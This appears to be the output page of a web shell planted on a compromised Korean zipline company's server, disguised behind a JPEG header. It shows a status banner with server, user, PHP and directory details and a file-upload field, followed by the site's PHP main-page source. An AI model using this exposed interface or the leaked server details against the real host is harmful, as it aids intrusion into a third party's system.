ÿØÿà JFIF ` ` ÿþ
Server : Apache System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : tkt_travelbus ( 1137) PHP Version : 7.0.0p1 Disable Function : mysql_pconnect Directory : /tkt_travelbus/www/skin/latest/main_s2/ |
Upload File : |
<? include_once("./_common.php"); include_once("$g4[path]/lib/latest.lib.php"); $g4['title'] = ""; $ServerURL = $_SERVER['HTTP_HOST']; include_once("./_head.php"); ?> <!-- <script language="JavaScript" type="text/JavaScript"> var mobileKeyWords = new Array('iPhone', 'iPod', 'BlackBerry', 'Android', 'Windows CE', 'LG', 'MOT', 'SAMSUNG', 'SonyEricsson'); for(var word in mobileKeyWords){ if(navigator.userAgent.match(mobileKeyWords[word]) != null){ window.location.href='./m/index.html'; break; } } </script> --> <script> function cookieVal(cookieName){ thisCookie = document.cookie.split("; "); for(i=0; i<thisCookie.length; i++){ if(cookieName == thisCookie[i].split("=")[0]){ return thisCookie[i].split("=")[1]; } } return "x"; } function popup1(){ if(cookieVal("popnotice")!= "1"){ window.open("<?=$g4_path?>/popup/pop150616.html","notice1","height=523, width=800, left=0, top=0, status=yes,menubar=no,scrollbars=no"); //window.open("http://zipline.co.kr/popup/pop0330.html","notice1","height=705, width=352, left=0, top=0, status=yes,menubar=no,scrollbars=no"); } } </script> <script language="JavaScript"> <!-- function na_open_window(name, url, left, top, width, height, toolbar, menubar, statusbar, scrollbar, resizable) { toolbar_str = toolbar ? 'yes' : 'no'; menubar_str = menubar ? 'yes' : 'no'; statusbar_str = statusbar ? 'yes' : 'no'; scrollbar_str = scrollbar ? 'yes' : 'no'; resizable_str = resizable ? 'yes' : 'no'; window.open(url, name, 'left='+left+',top='+top+',width='+width+',height='+height+',toolbar='+toolbar_str+',menubar='+menubar_str+',status='+statusbar_str+',scrollbars='+scrollbar_str+',resizable='+resizable_str); } // --> </script> <!-- <body onload="popup1()"></body> --> <? include_once("./_common.php"); include_once("$g4[path]/lib/latest.lib.php"); $g4['title'] = ""; include_once("./_head2.php"); ?> <script> function cookieVal(cookieName){ thisCookie = document.cookie.split("; "); for(i=0; i<thisCookie.length; i++){ if(cookieName == thisCookie[i].split("=")[0]){ return thisCookie[i].split("=")[1]; } } return "x"; } </script> <!-- 유투브 영역 --> <? $sql = " SELECT * FROM `g4_youtube` "; $result = sql_query($sql); $mmf = sql_fetch_array($result) ?> <div class="youtubeZone"> <div class="videoWrap"> <iframe width="623" height="315" src="<?=$mmf[cf_1]?>" frameborder="0" allowfullscreen></iframe> </div> <div class="linkMobile"> <p><a href="http://www.ziplinekorea.co.kr/plan/inquiry.php"><img src="./imagesNew/common/btnBusiness.png" alt="시공문의" /></a></p> <p><img src="./imagesNew/common/btnMobile.png" alt="모바일" /></p> </div> </div> <!-- //유투브 영역 --> <!-- S: 빠른 예약 --> <div class="wrap-qreservation"> <ul> <li class="reserv_box"><!-- <a href="/bbs/board.php?bo_table=co_ucc"><img src="/img/main/banner-ucc.gif"></a><input type="image" src="/img/main/banner-ucc.gif" onclick="document.getElementById('mw_temp').style.display='block'" /> --><a href="/sub3/sub3_03_4.php" style="display:block; padding-top:10px;"><img src="/img/main/banner-mungyeong.png" alt="contact us(오시는 길) 짚라인 문경 - 경상북도 문경시 불정동 336-3 불정자연휴양림(745-140)"/></a></li> <li class="reserv_box"> <div class="reserv-wrap"> <form action="mainreservation.php"> <div class="reserv-box"> <input type="hidden" name="bo_table" value="re_reserv" /> <input type="hidden" name="sca" value="<?=$sca?>" /> <input type="hidden" name="sfl" value="wr_link1" /> <input type="hidden" name="stx" value="<?=$stx?>" /> <input type="hidden" name="Smode_tmp" value="3007" /> <fieldset> <legend>Legend</legend> <p class="title"><img src="/img/main/reserv_title1.gif" width="25" height="14" alt="" /></p> <div class="select" style="width:150px; z-index:2"> <span class="ctrl"><span class="arrow"></span></span> <div class="my_value"> <span class="blind">장소선택</span> </div> <ul class="i_list"> <li><input name="area" value="mg" id="a0" checked="checked" class="option" type="radio"/><label for="a0">문경 짚라인</label></li> <li><input name="area" value="yi" id="a1" value="" class="option" type="radio" /><label for="a1">용인 짚라인</label></li> <li><input name="area" value="cj" id="a2" value="" class="option" type="radio"/><label for="a2">충주 짚라인</label></li> <li><input name="area" value="yg" id="a3" value="" class="option" type="radio"/><label for="a3">양구 짚라인</label></li> <li><input name="area" value="yy" id="a4" value="" class="option" type="radio"/><label for="a4">양양 짚라인</label></li> <li><input name="area" value="sa" id="a5" value="" class="option" type="radio"/><label for="a5">설악 짚라인</label></li> </ul> </div> <p class="title"><img src="/img/main/reserv_title2.gif" width="25" height="14" alt="" /></p> <input type="text" name="search_value2" id="search_value2" value="<?=$search_value2?>" class="zip_date" style="width:125px" readonly="readonly" /> <span> <img src="/img/main/reserv_ico.gif" width="15" height="18" alt="날짜 선택" onclick="aChimCalendar.Show(document.getElementById('search_value2'), isGetAbsoluteLeft(), isGetAbsoluteTop());" /> </span> <script type="text/javascript"> //<![CDATA[ var aChimCalendar = new wDatePickerCtrl("aChimCalendar","<?=$g4['path']?>/img/common"); aChimCalendar.Init(); //]]> </script> <p class="title"><img src="/img/main/reserv_title3.gif" width="25" height="14" alt="" /></p> <div class="select" style="width:150px; z-index:1;"> <select name="mcnt"> <?for($in=1; $in < 11; $in++){?> <option value="<?=$in?>" <?if($in == $mcnt)echo "selected='selected'"?>><?=$in?></option> <?}?> </select> 명 </div> </fieldset> </div> <div class="reserv-btn"> <input type="image" src="/img/main/reserv_btn.gif" title="탑승예약하기"/> </div> </form> </div> <p class="reserv-txt"><img src="/img/main/reserv_txt.gif" width="281" height="15" alt="짚라인 탑승예약은 빨리 마감이 되므로 망설이지 말고 서두르세요" /> </p> </li> <li class="reserv_box last"><a href="/sub7/sub7_07.php"><img src="/img/main/banner-cs.gif" width="310" height="135" alt="CUSTOMER CENTER" /></a></li> </ul> </div> <!-- E: 빠른 예약 --> <!-- S: 메인화면 최신글 --> <div class="wrap-tlatest"> <div class="tlatest-box"> <div class="wrap-latest"> <ul> <li style="float:left;"><?=tab_list("basic_brown", "cu_notice/cu_news","1","5", "320/92/30"); // 탭 리스트?></li> <li><?=tab_list("basic_brown2", "tw_after/cu_qna","1","5", "320/92/30"); // 탭 리스트?></li> </ul> </div> </div> <div class="iconbanner-box"> <div class="wrap-blog"> <div class="btnSnsZip"><img src="./imagesNew/common/btnZipSns.png" alt="sns" /></div> <ul> <!-- <li style="float:left;"><a href="http://blog.naver.com/happyzippy" target="_blank"><img src="/img/main/naver_icon.gif" alt=" NAVER"/></a></li> <li><a href="#" target="_blank"><img src="/img/main/tistory_icon.gif" alt="공사 중입니다"/></a></li> <li style="float:left;"><a href="http://twitter.com/#!/ziplinekorea" target="_blank"><img src="/img/main/twitter_icon.gif" alt="twitter"/></a></li> --> <!-- <li><a href="javascript:ready()"><img src="/img/main/tistory_icon.gif" alt="TISTORY"/></a></li> --> <li style="float:left; margin-right:15px;"><a href="https://www.facebook.com/ZiplineKorea" target="_blank"><img src="/img/main/facebook_icon.gif" alt=" facebook"/></a></li> <li><a href="http://blog.naver.com/PostList.nhn?blogId=happyzippy&from=postList&categoryNo=40&parentCategoryNo=40" target="_blank"><img src="/img/main/twitter_icon.gif" alt="twitter"/></a></li> </ul> </div> </div> </div> <!-- E: 메인화면 최신글 --> <?include_once("./_tail.php");?>